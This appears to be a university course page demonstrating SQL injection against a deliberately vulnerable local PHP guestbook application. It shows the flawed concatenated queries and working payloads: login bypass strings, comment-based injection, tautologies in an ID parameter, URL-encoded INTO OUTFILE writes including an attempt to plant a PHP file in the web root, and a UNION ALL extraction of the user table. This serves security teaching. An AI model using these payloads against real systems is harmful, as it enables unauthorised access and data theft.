Examples for SQL Injection
For this example, we use the "Guestbook" application. guestbook (only on my local computer).
Those examples work better if the magic_quote_gpc is set to false in the php.ini config file. Otherwize, you get backslash before the quotes and double quotes.
Login
The login function in the source code contains the following code:$query = "select * from user where username='$user' and password = '$pwd'"; $result = mysql_query($query , $conn);
In order to log in the system without password, type:
username = "' OR 'a'='a password =
In order to log in the system with username "benoist":
username = emmanuel password = ' OR 'b' BETWEEN 'a' AND 'c
We can achieve the same goal using comments, we comment out the rest of the line.
username = emmanuel'# password = Hello World (it does not matter any how)
Selection of a page
The selection of a page is done using the following code in the php program:
$query = "select username, guestbook.* from user, guestbook where guestbookID=$number AND guestbook.author=userID"; $result = mysql_query($query , $conn);
In order to manipulate the parameter $number, just visit a message and change its ID in the query string.
Access to any information
id= 11 or 1=1
Transfer information into a file:
id= 11 or 1=1 INTO OUTFILE '/tmp/test.txt'#But this sentence is not valid for a URL, so we need to URL encode it:
11+or+1%3D1+INTO++OUTFILE+%27%2Ftmp%2Ftest.txt%27%23The file created "/tmp/test.txt" has the same owner as the one executing MySQL.
We want to write a php file in our htdocs.
id= 11 or 1=1 INTO OUTFILE '/Applications/XAMPP/htdocs/test.php'#Which is url-encoded in:
11+or+1%3D1+INTO++OUTFILE+%27%2FApplications%2FXAMPP%2Fhtdocs%2Ftest.php%27%23Unfortunately (or fortunately) one can not write into the directory "htdocs" because the user "nobody" does not have enought rights.
Union All
Use UNION ALL to view the content of another table
In the search field:
hello%' union all select * from user, guestbook where user.userID=guestbook.author group by userID#
Related Pages
Contact
Berner Fachhochschule - TI
Quellgasse 21
CH-2501 Biel/Bienne
Switzerland
Mail: emmanuel.benoist (at) bfh.ch
Social Networks
Follow
me
on
Linkedin, Scholar
& Research gate